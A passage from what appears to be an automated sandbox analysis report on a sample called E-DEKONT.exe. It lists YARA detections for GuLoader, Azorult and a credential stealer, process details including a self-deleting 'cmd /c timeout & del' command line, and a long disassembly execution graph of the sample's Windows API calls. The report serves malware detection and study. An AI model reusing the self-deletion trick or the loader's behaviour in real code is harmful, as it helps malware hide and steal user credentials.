                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          General

                                                                          Target ID:4
                                                                          Start time:09:20:14
                                                                          Start date:29/11/2022
                                                                          Path:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Imagebase:0x400000
                                                                          File size:325782 bytes
                                                                          MD5 hash:0AA36EB080CF7171CEC271B2CD4D2108
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.108599370042.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          General

                                                                          Target ID:5
                                                                          Start time:09:20:53
                                                                          Start date:29/11/2022
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
                                                                          Imagebase:0x4a0000
                                                                          File size:236544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:6
                                                                          Start time:09:20:54
                                                                          Start date:29/11/2022
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff732460000
                                                                          File size:875008 bytes
                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:7
                                                                          Start time:09:20:54
                                                                          Start date:29/11/2022
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\timeout.exe 3
                                                                          Imagebase:0xba0000
                                                                          File size:25088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:7.8%
                                                                            Dynamic/Decrypted Code Coverage:5.6%
                                                                            Signature Coverage:21.5%
                                                                            Total number of Nodes:1633
                                                                            Total number of Limit Nodes:58
                                                                            execution_graph 9552 10001000 9555 1000101b 9552->9555 9562 10001516 9555->9562 9557 10001020 9558 10001024 9557->9558 9559 10001027 GlobalAlloc 9557->9559 9560 1000153d 3 API calls 9558->9560 9559->9558 9561 10001019 9560->9561 9564 1000151c 9562->9564 9563 10001522 9563->9557 9564->9563 9565 1000152e GlobalFree 9564->9565 9565->9557 8459 401941 8460 401943 8459->8460 8461 402c37 17 API calls 8460->8461 8462 401948 8461->8462 8465 405990 8462->8465 8504 405c5b 8465->8504 8468 4059b8 DeleteFileW 8470 401951 8468->8470 8469 4059cf 8475 405aef 8469->8475 8518 406282 lstrcpynW 8469->8518 8472 4059f5 8473 405a08 8472->8473 8474 4059fb lstrcatW 8472->8474 8519 405b9f lstrlenW 8473->8519 8476 405a0e 8474->8476 8475->8470 8536 4065c5 FindFirstFileW 8475->8536 8479 405a1e lstrcatW 8476->8479 8481 405a29 lstrlenW FindFirstFileW 8476->8481 8479->8481 8481->8475 8489 405a4b 8481->8489 8482 405b18 8539 405b53 lstrlenW CharPrevW 8482->8539 8485 405948 5 API calls 8488 405b2a 8485->8488 8487 405ad2 FindNextFileW 8487->8489 8490 405ae8 FindClose 8487->8490 8491 405b44 8488->8491 8492 405b2e 8488->8492 8489->8487 8500 405a93 8489->8500 8523 406282 lstrcpynW 8489->8523 8490->8475 8494 4052e6 24 API calls 8491->8494 8492->8470 8495 4052e6 24 API calls 8492->8495 8494->8470 8497 405b3b 8495->8497 8496 405990 60 API calls 8496->8500 8499 406048 36 API calls 8497->8499 8498 4052e6 24 API calls 8498->8487 8501 405b42 8499->8501 8500->8487 8500->8496 8500->8498 8502 4052e6 24 API calls 8500->8502 8524 405948 8500->8524 8532 406048 MoveFileExW 8500->8532 8501->8470 8502->8500 8542 406282 lstrcpynW 8504->8542 8506 405c6c 8543 405bfe CharNextW CharNextW 8506->8543 8509 4059b0 8509->8468 8509->8469 8510 406516 5 API calls 8516 405c82 8510->8516 8511 405cb3 lstrlenW 8512 405cbe 8511->8512 8511->8516 8513 405b53 3 API calls 8512->8513 8515 405cc3 GetFileAttributesW 8513->8515 8514 4065c5 2 API calls 8514->8516 8515->8509 8516->8509 8516->8511 8516->8514 8517 405b9f 2 API calls 8516->8517 8517->8511 8518->8472 8520 405bad 8519->8520 8521 405bb3 CharPrevW 8520->8521 8522 405bbf 8520->8522 8521->8520 8521->8522 8522->8476 8523->8489 8549 405d4f GetFileAttributesW 8524->8549 8527 405963 RemoveDirectoryW 8530 405971 8527->8530 8528 40596b DeleteFileW 8528->8530 8529 405975 8529->8500 8530->8529 8531 405981 SetFileAttributesW 8530->8531 8531->8529 8533 406069 8532->8533 8534 40605c 8532->8534 8533->8500 8552 405ece 8534->8552 8537 405b14 8536->8537 8538 4065db FindClose 8536->8538 8537->8470 8537->8482 8538->8537 8540 405b1e 8539->8540 8541 405b6f lstrcatW 8539->8541 8540->8485 8541->8540 8542->8506 8544 405c1b 8543->8544 8545 405c2d 8543->8545 8544->8545 8546 405c28 CharNextW 8544->8546 8547 405b80 CharNextW 8545->8547 8548 405c51 8545->8548 8546->8548 8547->8545 8548->8509 8548->8510 8550 405d61 SetFileAttributesW 8549->8550 8551 405954 8549->8551 8550->8551 8551->8527 8551->8528 8551->8529 8553 405f24 GetShortPathNameW 8552->8553 8554 405efe 8552->8554 8556 406043 8553->8556 8557 405f39 8553->8557 8579 405d74 GetFileAttributesW CreateFileW 8554->8579 8556->8533 8557->8556 8559 405f41 wsprintfA 8557->8559 8558 405f08 CloseHandle GetShortPathNameW 8558->8556 8560 405f1c 8558->8560 8561 4062a4 17 API calls 8559->8561 8560->8553 8560->8556 8562 405f69 8561->8562 8580 405d74 GetFileAttributesW CreateFileW 8562->8580 8564 405f76 8564->8556 8565 405f85 GetFileSize GlobalAlloc 8564->8565 8566 405fa7 8565->8566 8567 40603c CloseHandle 8565->8567 8581 405df7 ReadFile 8566->8581 8567->8556 8572 405fc6 lstrcpyA 8575 405fe8 8572->8575 8573 405fda 8574 405cd9 4 API calls 8573->8574 8574->8575 8576 40601f SetFilePointer 8575->8576 8588 405e26 WriteFile 8576->8588 8579->8558 8580->8564 8582 405e15 8581->8582 8582->8567 8583 405cd9 lstrlenA 8582->8583 8584 405d1a lstrlenA 8583->8584 8585 405d22 8584->8585 8586 405cf3 lstrcmpiA 8584->8586 8585->8572 8585->8573 8586->8585 8587 405d11 CharNextA 8586->8587 8587->8584 8589 405e44 GlobalFree 8588->8589 8589->8567 8636 401e43 8644 402c15 8636->8644 8638 401e49 8639 402c15 17 API calls 8638->8639 8640 401e55 8639->8640 8641 401e61 ShowWindow 8640->8641 8642 401e6c EnableWindow 8640->8642 8643 402abf 8641->8643 8642->8643 8645 4062a4 17 API calls 8644->8645 8646 402c2a 8645->8646 8646->8638 8647 402644 8648 402c15 17 API calls 8647->8648 8658 402653 8648->8658 8649 402790 8650 40269d ReadFile 8650->8649 8650->8658 8651 402736 8651->8649 8651->8658 8661 405e55 SetFilePointer 8651->8661 8652 405df7 ReadFile 8652->8658 8654 402792 8670 4061c9 wsprintfW 8654->8670 8655 4026dd MultiByteToWideChar 8655->8658 8657 402703 SetFilePointer MultiByteToWideChar 8657->8658 8658->8649 8658->8650 8658->8651 8658->8652 8658->8654 8658->8655 8658->8657 8660 4027a3 8658->8660 8659 4027c4 SetFilePointer 8659->8649 8660->8649 8660->8659 8662 405e71 8661->8662 8667 405e8d 8661->8667 8663 405df7 ReadFile 8662->8663 8664 405e7d 8663->8664 8665 405e96 SetFilePointer 8664->8665 8666 405ebe SetFilePointer 8664->8666 8664->8667 8665->8666 8668 405ea1 8665->8668 8666->8667 8667->8651 8669 405e26 WriteFile 8668->8669 8669->8667 8670->8649 10016 402348 10017 402c37 17 API calls 10016->10017 10018 402357 10017->10018 10019 402c37 17 API calls 10018->10019 10020 402360 10019->10020 10021 402c37 17 API calls 10020->10021 10022 40236a GetPrivateProfileStringW 10021->10022 10023 401b4d 10024 402c37 17 API calls 10023->10024 10025 401b54 10024->10025 10026 402c15 17 API calls 10025->10026 10027 401b5d wsprintfW 10026->10027 10028 402abf 10027->10028 8715 2b633b8 EnumWindows 8716 2b6336e 8715->8716 10029 40394e 10030 403959 10029->10030 10031 403960 GlobalAlloc 10030->10031 10032 40395d 10030->10032 10031->10032 10033 401f52 10034 402c37 17 API calls 10033->10034 10035 401f59 10034->10035 10036 4065c5 2 API calls 10035->10036 10037 401f5f 10036->10037 10039 401f70 10037->10039 10040 4061c9 wsprintfW 10037->10040 10040->10039 9570 402253 9571 402c37 17 API calls 9570->9571 9572 402259 9571->9572 9573 402c37 17 API calls 9572->9573 9574 402262 9573->9574 9575 402c37 17 API calls 9574->9575 9576 40226b 9575->9576 9577 4065c5 2 API calls 9576->9577 9578 402274 9577->9578 9579 402285 lstrlenW lstrlenW 9578->9579 9580 402278 9578->9580 9581 4052e6 24 API calls 9579->9581 9582 4052e6 24 API calls 9580->9582 9584 402280 9580->9584 9583 4022c3 SHFileOperationW 9581->9583 9582->9584 9583->9580 9583->9584 10041 401956 10042 402c37 17 API calls 10041->10042 10043 40195d lstrlenW 10042->10043 10044 40258c 10043->10044 10045 401d57 GetDlgItem GetClientRect 10046 402c37 17 API calls 10045->10046 10047 401d89 LoadImageW SendMessageW 10046->10047 10048 401da7 DeleteObject 10047->10048 10049 402abf 10047->10049 10048->10049 8766 40525a 8767 40526a 8766->8767 8768 40527e 8766->8768 8769 405270 8767->8769 8770 4052c7 8767->8770 8771 405286 IsWindowVisible 8768->8771 8778 4052a6 8768->8778 8780 404263 8769->8780 8772 4052cc CallWindowProcW 8770->8772 8771->8770 8774 405293 8771->8774 8776 40527a 8772->8776 8783 404bb0 SendMessageW 8774->8783 8778->8772 8788 404c30 8778->8788 8781 40427b 8780->8781 8782 40426c SendMessageW 8780->8782 8781->8776 8782->8781 8784 404bd3 GetMessagePos ScreenToClient SendMessageW 8783->8784 8785 404c0f SendMessageW 8783->8785 8786 404c07 8784->8786 8787 404c0c 8784->8787 8785->8786 8786->8778 8787->8785 8797 406282 lstrcpynW 8788->8797 8790 404c43 8798 4061c9 wsprintfW 8790->8798 8792 404c4d 8799 40140b 8792->8799 8796 404c5d 8796->8770 8797->8790 8798->8792 8803 401389 8799->8803 8802 406282 lstrcpynW 8802->8796 8805 401390 8803->8805 8804 4013fe 8804->8802 8805->8804 8806 4013cb MulDiv SendMessageW 8805->8806 8806->8805 8821 40175c 8822 402c37 17 API calls 8821->8822 8823 401763 8822->8823 8827 405da3 8823->8827 8825 40176a 8826 405da3 2 API calls 8825->8826 8826->8825 8828 405db0 GetTickCount GetTempFileNameW 8827->8828 8829 405dea 8828->8829 8830 405de6 8828->8830 8829->8825 8830->8828 8830->8829 8880 404c62 GetDlgItem GetDlgItem 8881 404cb4 7 API calls 8880->8881 8891 404ecd 8880->8891 8882 404d57 DeleteObject 8881->8882 8883 404d4a SendMessageW 8881->8883 8884 404d60 8882->8884 8883->8882 8885 404d6f 8884->8885 8886 404d97 8884->8886 8889 4062a4 17 API calls 8885->8889 8936 404217 8886->8936 8887 40505d 8894 405067 SendMessageW 8887->8894 8901 40506f 8887->8901 8888 404fb1 8888->8887 8893 405245 8888->8893 8898 40500a SendMessageW 8888->8898 8895 404d79 SendMessageW SendMessageW 8889->8895 8890 404f92 8890->8888 8900 404fa3 SendMessageW 8890->8900 8891->8888 8891->8890 8896 404f2d 8891->8896 8944 40427e 8893->8944 8894->8901 8895->8884 8902 404bb0 5 API calls 8896->8902 8897 404dab 8903 404217 18 API calls 8897->8903 8898->8893 8905 40501f SendMessageW 8898->8905 8900->8888 8907 405081 ImageList_Destroy 8901->8907 8908 405088 8901->8908 8912 405098 8901->8912 8915 404f3e 8902->8915 8916 404db9 8903->8916 8904 405207 8904->8893 8913 405219 ShowWindow GetDlgItem ShowWindow 8904->8913 8910 405032 8905->8910 8907->8908 8911 405091 GlobalFree 8908->8911 8908->8912 8909 404e8e GetWindowLongW SetWindowLongW 8914 404ea7 8909->8914 8921 405043 SendMessageW 8910->8921 8911->8912 8912->8904 8926 404c30 4 API calls 8912->8926 8931 4050d3 8912->8931 8913->8893 8917 404ec5 8914->8917 8918 404ead ShowWindow 8914->8918 8915->8890 8916->8909 8920 404e09 SendMessageW 8916->8920 8922 404e88 8916->8922 8924 404e45 SendMessageW 8916->8924 8925 404e56 SendMessageW 8916->8925 8940 40424c SendMessageW 8917->8940 8939 40424c SendMessageW 8918->8939 8920->8916 8921->8887 8922->8909 8922->8914 8924->8916 8925->8916 8926->8931 8927 404ec0 8927->8893 8928 4051dd InvalidateRect 8928->8904 8929 4051f3 8928->8929 8941 404b6b 8929->8941 8930 405101 SendMessageW 8932 405117 8930->8932 8931->8930 8931->8932 8932->8928 8933 405178 8932->8933 8935 40518b SendMessageW SendMessageW 8932->8935 8933->8935 8935->8932 8937 4062a4 17 API calls 8936->8937 8938 404222 SetDlgItemTextW 8937->8938 8938->8897 8939->8927 8940->8891 8958 404aa2 8941->8958 8943 404b80 8943->8904 8945 40431f 8944->8945 8946 404296 GetWindowLongW 8944->8946 8946->8945 8947 4042a7 8946->8947 8948 4042b6 GetSysColor 8947->8948 8949 4042b9 8947->8949 8948->8949 8950 4042c9 SetBkMode 8949->8950 8951 4042bf SetTextColor 8949->8951 8952 4042e1 GetSysColor 8950->8952 8953 4042e7 8950->8953 8951->8950 8952->8953 8954 4042f8 8953->8954 8955 4042ee SetBkColor 8953->8955 8954->8945 8956 404312 CreateBrushIndirect 8954->8956 8957 40430b DeleteObject 8954->8957 8955->8954 8956->8945 8957->8956 8959 404abb 8958->8959 8960 4062a4 17 API calls 8959->8960 8961 404b1f 8960->8961 8962 4062a4 17 API calls 8961->8962 8963 404b2a 8962->8963 8964 4062a4 17 API calls 8963->8964 8965 404b40 lstrlenW wsprintfW SetDlgItemTextW 8964->8965 8965->8943 9585 402862 9586 402c37 17 API calls 9585->9586 9587 402869 FindFirstFileW 9586->9587 9588 402891 9587->9588 9589 40287c 9587->9589 9593 4061c9 wsprintfW 9588->9593 9591 40289a 9594 406282 lstrcpynW 9591->9594 9593->9591 9594->9589 10050 401563 10051 402a65 10050->10051 10054 4061c9 wsprintfW 10051->10054 10053 402a6a 10054->10053 9595 2b69092 9596 2b69099 9595->9596 9598 2b6913a 9596->9598 9600 2b6352f 9596->9600 9601 2b86193 9596->9601 9599 2b86193 K32EnumDeviceDrivers 9598->9599 9598->9600 9599->9600 9602 2b86198 K32EnumDeviceDrivers 9601->9602 10055 404365 lstrlenW 10056 404384 10055->10056 10057 404386 WideCharToMultiByte 10055->10057 10056->10057 10058 401968 10059 402c15 17 API calls 10058->10059 10060 40196f 10059->10060 10061 402c15 17 API calls 10060->10061 10062 40197c 10061->10062 10063 402c37 17 API calls 10062->10063 10064 401993 lstrlenW 10063->10064 10065 4019a4 10064->10065 10069 4019e5 10065->10069 10070 406282 lstrcpynW 10065->10070 10067 4019d5 10068 4019da lstrlenW 10067->10068 10067->10069 10068->10069 10070->10067 9603 40166a 9604 402c37 17 API calls 9603->9604 9605 401670 9604->9605 9606 4065c5 2 API calls 9605->9606 9607 401676 9606->9607 8979 2b86193 8981 2b86198 8979->8981 8982 2b86201 8981->8982 8983 2b86529 K32EnumDeviceDrivers 8982->8983 8984 2b86590 8983->8984 8984->8984 9167 40176f 9168 402c37 17 API calls 9167->9168 9169 401776 9168->9169 9170 401796 9169->9170 9171 40179e 9169->9171 9206 406282 lstrcpynW 9170->9206 9207 406282 lstrcpynW 9171->9207 9174 40179c 9178 406516 5 API calls 9174->9178 9175 4017a9 9176 405b53 3 API calls 9175->9176 9177 4017af lstrcatW 9176->9177 9177->9174 9193 4017bb 9178->9193 9179 4065c5 2 API calls 9179->9193 9180 405d4f 2 API calls 9180->9193 9182 4017cd CompareFileTime 9182->9193 9183 40188d 9185 4052e6 24 API calls 9183->9185 9184 401864 9187 4052e6 24 API calls 9184->9187 9194 401879 9184->9194 9186 401897 9185->9186 9188 4030fa 31 API calls 9186->9188 9187->9194 9189 4018aa 9188->9189 9190 4018be SetFileTime 9189->9190 9192 4018d0 CloseHandle 9189->9192 9190->9192 9191 4062a4 17 API calls 9191->9193 9192->9194 9195 4018e1 9192->9195 9193->9179 9193->9180 9193->9182 9193->9183 9193->9184 9193->9191 9196 406282 lstrcpynW 9193->9196 9205 405d74 GetFileAttributesW CreateFileW 9193->9205 9208 4058e4 9193->9208 9197 4018e6 9195->9197 9198 4018f9 9195->9198 9196->9193 9200 4062a4 17 API calls 9197->9200 9199 4062a4 17 API calls 9198->9199 9201 401901 9199->9201 9203 4018ee lstrcatW 9200->9203 9201->9194 9204 4058e4 MessageBoxIndirectW 9201->9204 9203->9201 9204->9194 9205->9193 9206->9174 9207->9175 9209 4058f9 9208->9209 9210 405945 9209->9210 9211 40590d MessageBoxIndirectW 9209->9211 9210->9193 9211->9210 10075 402570 10076 402c37 17 API calls 10075->10076 10077 402577 10076->10077 10080 405d74 GetFileAttributesW CreateFileW 10077->10080 10079 402583 10080->10079 10081 401b71 10082 401bc2 10081->10082 10083 401b7e 10081->10083 10085 401bc7 10082->10085 10086 401bec GlobalAlloc 10082->10086 10084 401c07 10083->10084 10089 401b95 10083->10089 10088 4062a4 17 API calls 10084->10088 10092 4022f1 10084->10092 10085->10092 10102 406282 lstrcpynW 10085->10102 10087 4062a4 17 API calls 10086->10087 10087->10084 10093 4022eb 10088->10093 10100 406282 lstrcpynW 10089->10100 10093->10092 10096 4058e4 MessageBoxIndirectW 10093->10096 10094 401bd9 GlobalFree 10094->10092 10095 401ba4 10101 406282 lstrcpynW 10095->10101 10096->10092 10098 401bb3 10103 406282 lstrcpynW 10098->10103 10100->10095 10101->10098 10102->10094 10103->10092 9608 401a72 9609 402c15 17 API calls 9608->9609 9610 401a78 9609->9610 9611 402c15 17 API calls 9610->9611 9612 401a20 9611->9612 9222 403373 SetErrorMode GetVersion 9223 4033b2 9222->9223 9224 4033b8 9222->9224 9225 40665c 5 API calls 9223->9225 9226 4065ec 3 API calls 9224->9226 9225->9224 9227 4033ce lstrlenA 9226->9227 9227->9224 9228 4033de 9227->9228 9229 40665c 5 API calls 9228->9229 9230 4033e5 9229->9230 9231 40665c 5 API calls 9230->9231 9232 4033ec 9231->9232 9233 40665c 5 API calls 9232->9233 9234 4033f8 #17 OleInitialize SHGetFileInfoW 9233->9234 9313 406282 lstrcpynW 9234->9313 9237 403444 GetCommandLineW 9314 406282 lstrcpynW 9237->9314 9239 403456 GetModuleHandleW 9240 40346e 9239->9240 9241 405b80 CharNextW 9240->9241 9242 40347d CharNextW 9241->9242 9243 4035a7 GetTempPathW 9242->9243 9244 403496 9242->9244 9315 403342 9243->9315 9250 405b80 CharNextW 9244->9250 9257 403592 9244->9257 9258 403590 9244->9258 9246 4035bf 9247 4035c3 GetWindowsDirectoryW lstrcatW 9246->9247 9248 403619 DeleteFileW 9246->9248 9249 403342 12 API calls 9247->9249 9325 402ec1 GetTickCount GetModuleFileNameW 9248->9325 9252 4035df 9249->9252 9250->9244 9252->9248 9253 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 9252->9253 9256 403342 12 API calls 9253->9256 9254 4036e0 9412 4038b6 9254->9412 9255 40362d 9255->9254 9259 4036d0 9255->9259 9263 405b80 CharNextW 9255->9263 9261 403611 9256->9261 9409 406282 lstrcpynW 9257->9409 9258->9243 9353 403990 9259->9353 9261->9248 9261->9254 9280 40364c 9263->9280 9266 40381a 9269 403822 GetCurrentProcess OpenProcessToken 9266->9269 9270 40389e ExitProcess 9266->9270 9267 4036fa 9268 4058e4 MessageBoxIndirectW 9267->9268 9272 403708 ExitProcess 9268->9272 9275 40383a LookupPrivilegeValueW AdjustTokenPrivileges 9269->9275 9276 40386e 9269->9276 9273 403710 9278 40584f 5 API calls 9273->9278 9274 4036aa 9277 405c5b 18 API calls 9274->9277 9275->9276 9279 40665c 5 API calls 9276->9279 9281 4036b6 9277->9281 9282 403715 lstrcatW 9278->9282 9283 403875 9279->9283 9280->9273 9280->9274 9281->9254 9410 406282 lstrcpynW 9281->9410 9284 403731 lstrcatW lstrcmpiW 9282->9284 9285 403726 lstrcatW 9282->9285 9286 40388a ExitWindowsEx 9283->9286 9289 403897 9283->9289 9284->9254 9288 40374d 9284->9288 9285->9284 9286->9270 9286->9289 9291 403752 9288->9291 9292 403759 9288->9292 9293 40140b 2 API calls 9289->9293 9290 4036c5 9411 406282 lstrcpynW 9290->9411 9295 4057b5 4 API calls 9291->9295 9296 405832 2 API calls 9292->9296 9293->9270 9297 403757 9295->9297 9298 40375e SetCurrentDirectoryW 9296->9298 9297->9298 9299 403779 9298->9299 9300 40376e 9298->9300 9420 406282 lstrcpynW 9299->9420 9419 406282 lstrcpynW 9300->9419 9303 4062a4 17 API calls 9304 4037b8 DeleteFileW 9303->9304 9305 4037c5 CopyFileW 9304->9305 9310 403787 9304->9310 9305->9310 9306 40380e 9307 406048 36 API calls 9306->9307 9307->9254 9308 406048 36 API calls 9308->9310 9309 4062a4 17 API calls 9309->9310 9310->9303 9310->9306 9310->9308 9310->9309 9311 405867 2 API calls 9310->9311 9312 4037f9 CloseHandle 9310->9312 9311->9310 9312->9310 9313->9237 9314->9239 9316 406516 5 API calls 9315->9316 9318 40334e 9316->9318 9317 403358 9317->9246 9318->9317 9319 405b53 3 API calls 9318->9319 9320 403360 9319->9320 9321 405832 2 API calls 9320->9321 9322 403366 9321->9322 9323 405da3 2 API calls 9322->9323 9324 403371 9323->9324 9324->9246 9421 405d74 GetFileAttributesW CreateFileW 9325->9421 9327 402f01 9346 402f11 9327->9346 9422 406282 lstrcpynW 9327->9422 9329 402f27 9330 405b9f 2 API calls 9329->9330 9331 402f2d 9330->9331 9423 406282 lstrcpynW 9331->9423 9333 402f38 GetFileSize 9334 403034 9333->9334 9352 402f4f 9333->9352 9424 402e5d 9334->9424 9336 40303d 9338 40306d GlobalAlloc 9336->9338 9336->9346 9436 40332b SetFilePointer 9336->9436 9337 403315 ReadFile 9337->9352 9435 40332b SetFilePointer 9338->9435 9340 4030a0 9343 402e5d 6 API calls 9340->9343 9342 403088 9345 4030fa 31 API calls 9342->9345 9343->9346 9344 403056 9347 403315 ReadFile 9344->9347 9350 403094 9345->9350 9346->9255 9348 403061 9347->9348 9348->9338 9348->9346 9349 402e5d 6 API calls 9349->9352 9350->9346 9350->9350 9351 4030d1 SetFilePointer 9350->9351 9351->9346 9352->9334 9352->9337 9352->9340 9352->9346 9352->9349 9354 40665c 5 API calls 9353->9354 9355 4039a4 9354->9355 9356 4039aa GetUserDefaultUILanguage 9355->9356 9357 4039bc 9355->9357 9437 4061c9 wsprintfW 9356->9437 9359 406150 3 API calls 9357->9359 9361 4039ec 9359->9361 9360 4039ba 9438 403c66 9360->9438 9362 403a0b lstrcatW 9361->9362 9363 406150 3 API calls 9361->9363 9362->9360 9363->9362 9366 405c5b 18 API calls 9367 403a3d 9366->9367 9368 403ad1 9367->9368 9370 406150 3 API calls 9367->9370 9369 405c5b 18 API calls 9368->9369 9373 403ad7 9369->9373 9371 403a6f 9370->9371 9371->9368 9377 403a90 lstrlenW 9371->9377 9380 405b80 CharNextW 9371->9380 9372 403ae7 LoadImageW 9375 403b8d 9372->9375 9376 403b0e RegisterClassW 9372->9376 9373->9372 9374 4062a4 17 API calls 9373->9374 9374->9372 9379 40140b 2 API calls 9375->9379 9378 403b44 SystemParametersInfoW CreateWindowExW 9376->9378 9408 403b97 9376->9408 9381 403ac4 9377->9381 9382 403a9e lstrcmpiW 9377->9382 9378->9375 9383 403b93 9379->9383 9384 403a8d 9380->9384 9386 405b53 3 API calls 9381->9386 9382->9381 9385 403aae GetFileAttributesW 9382->9385 9388 403c66 18 API calls 9383->9388 9383->9408 9384->9377 9387 403aba 9385->9387 9389 403aca 9386->9389 9387->9381 9390 405b9f 2 API calls 9387->9390 9391 403ba4 9388->9391 9446 406282 lstrcpynW 9389->9446 9390->9381 9393 403bb0 ShowWindow 9391->9393 9394 403c33 9391->9394 9396 4065ec 3 API calls 9393->9396 9447 4053b9 OleInitialize 9394->9447 9397 403bc8 9396->9397 9399 403bd6 GetClassInfoW 9397->9399 9402 4065ec 3 API calls 9397->9402 9398 403c39 9400 403c55 9398->9400 9401 403c3d 9398->9401 9404 403c00 DialogBoxParamW 9399->9404 9405 403bea GetClassInfoW RegisterClassW 9399->9405 9403 40140b 2 API calls 9400->9403 9407 40140b 2 API calls 9401->9407 9401->9408 9402->9399 9403->9408 9406 40140b 2 API calls 9404->9406 9405->9404 9406->9408 9407->9408 9408->9254 9409->9258 9410->9290 9411->9259 9413 4038c0 CloseHandle 9412->9413 9414 4038ce 9412->9414 9413->9414 9458 4038fb 9414->9458 9417 405990 67 API calls 9418 4036e9 OleUninitialize 9417->9418 9418->9266 9418->9267 9419->9299 9420->9310 9421->9327 9422->9329 9423->9333 9425 402e66 9424->9425 9426 402e7e 9424->9426 9427 402e76 9425->9427 9428 402e6f DestroyWindow 9425->9428 9429 402e86 9426->9429 9430 402e8e GetTickCount 9426->9430 9427->9336 9428->9427 9431 406698 2 API calls 9429->9431 9432 402e9c CreateDialogParamW ShowWindow 9430->9432 9433 402ebf 9430->9433 9434 402e8c 9431->9434 9432->9433 9433->9336 9434->9336 9435->9342 9436->9344 9437->9360 9439 403c7a 9438->9439 9454 4061c9 wsprintfW 9439->9454 9441 403ceb 9455 403d1f 9441->9455 9443 403a1b 9443->9366 9444 403cf0 9444->9443 9445 4062a4 17 API calls 9444->9445 9445->9444 9446->9368 9448 404263 SendMessageW 9447->9448 9450 4053dc 9448->9450 9449 405403 9451 404263 SendMessageW 9449->9451 9450->9449 9453 401389 2 API calls 9450->9453 9452 405415 OleUninitialize 9451->9452 9452->9398 9453->9450 9454->9441 9456 4062a4 17 API calls 9455->9456 9457 403d2d SetWindowTextW 9456->9457 9457->9444 9459 403909 9458->9459 9460 4038d3 9459->9460 9461 40390e FreeLibrary GlobalFree 9459->9461 9460->9417 9461->9460 9461->9461 10104 401573 10105 401583 ShowWindow 10104->10105 10106 40158c 10104->10106 10105->10106 10107 40159a ShowWindow 10106->10107 10108 402abf 10106->10108 10107->10108 9613 401e77 9614 402c37 17 API calls 9613->9614 9615 401e7d 9614->9615 9616 402c37 17 API calls 9615->9616 9617 401e86 9616->9617 9618 402c37 17 API calls 9617->9618 9619 401e8f 9618->9619 9620 402c37 17 API calls 9619->9620 9621 401e98 9620->9621 9622 401423 24 API calls 9621->9622 9623 401e9f 9622->9623 9630 4058aa ShellExecuteExW 9623->9630 9625 401ee1 9626 40670d 5 API calls 9625->9626 9628 402885 9625->9628 9627 401efb CloseHandle 9626->9627 9627->9628 9630->9625 9631 10002238 9632 10002296 9631->9632 9634 100022cc 9631->9634 9633 100022a8 GlobalAlloc 9632->9633 9632->9634 9633->9632 9635 40167b 9636 402c37 17 API calls 9635->9636 9637 401682 9636->9637 9638 402c37 17 API calls 9637->9638 9639 40168b 9638->9639 9640 402c37 17 API calls 9639->9640 9641 401694 MoveFileW 9640->9641 9642 4016a7 9641->9642 9648 4016a0 9641->9648 9644 4065c5 2 API calls 9642->9644 9646 40224a 9642->9646 9643 401423 24 API calls 9643->9646 9645 4016b6 9644->9645 9645->9646 9647 406048 36 API calls 9645->9647 9647->9648 9648->9643 9649 1000103d 9650 1000101b 5 API calls 9649->9650 9651 10001056 9650->9651 9462 40247e 9463 402c77 17 API calls 9462->9463 9464 402488 9463->9464 9465 402c37 17 API calls 9464->9465 9466 402491 9465->9466 9467 40249c RegQueryValueExW 9466->9467 9471 402885 9466->9471 9468 4024c2 RegCloseKey 9467->9468 9469 4024bc 9467->9469 9468->9471 9469->9468 9473 4061c9 wsprintfW 9469->9473 9473->9468 8372 401f00 8387 402c37 8372->8387 8379 401f39 CloseHandle 8383 402885 8379->8383 8382 401f2b 8384 401f30 8382->8384 8385 401f3b 8382->8385 8412 4061c9 wsprintfW 8384->8412 8385->8379 8388 402c43 8387->8388 8413 4062a4 8388->8413 8391 401f06 8393 4052e6 8391->8393 8394 405301 8393->8394 8402 401f10 8393->8402 8395 40531d lstrlenW 8394->8395 8396 4062a4 17 API calls 8394->8396 8397 405346 8395->8397 8398 40532b lstrlenW 8395->8398 8396->8395 8399 405359 8397->8399 8400 40534c SetWindowTextW 